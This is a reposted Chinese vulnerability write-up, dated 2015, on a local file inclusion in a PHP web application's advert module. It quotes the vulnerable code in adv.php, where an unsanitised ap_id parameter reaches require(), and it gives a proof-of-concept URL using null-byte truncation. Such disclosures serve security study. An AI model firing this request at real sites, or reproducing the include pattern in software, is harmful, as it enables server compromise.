来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 这个东西前面还有个xss http://www.2cto.com/Article/201107/98039.html--------------------------------------------------------------------------------GPC面前一切都是浮云。。所以鸡肋。。./control/adv......
|
这个东西前面还有个xss http://www.2cto.com/Article/201107/98039.html
-------------------------------------------------------------------------------- GPC面前一切都是浮云。。所以鸡肋。。 ./control/adv.php class advControl { /** * * 广告展示 */ public function advshowOp(){ if(trim($_GET['ap_id']) == '')exit; $time = time(); //加载广告位缓存文件 $ap_cache_file = BasePath.DS.'cache'.DS.'adv'.DS.'ap_'.$_GET['ap_id'].'.cache.php'; //直接包含了。。 if(file_exists($ap_cache_file)){ require($ap_cache_file); }else{ exit; }./global.php 略 if($_GET['act'] == 'adv' && ProjectName == ''){ define('ATTACH_ADV','upload/adv'); require_once(BasePath.DS.'config.ini.php'); define('SiteUrl',$site_url); $advshow_classfile = BasePath.DS.'control/adv.php'; echo "<h1>sbsb</h1>"; if(file_exists($advshow_classfile)){ echo "<h1>sbsb</h1>"; include_once ($advshow_classfile); $advshow = new advControl(); $advshow->advshowOp(); //this.. }else{ echo "Adv System Inner Error!"; } 略Exp http://www.2cto.com /2008/upload/index.php?act=adv&ap_id=.sss.sb%00 www.2cto.com修古: 参考以上代码分析以及本站前面的文文章 From:http://t00ls.net/thread-20191-1-1.html |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
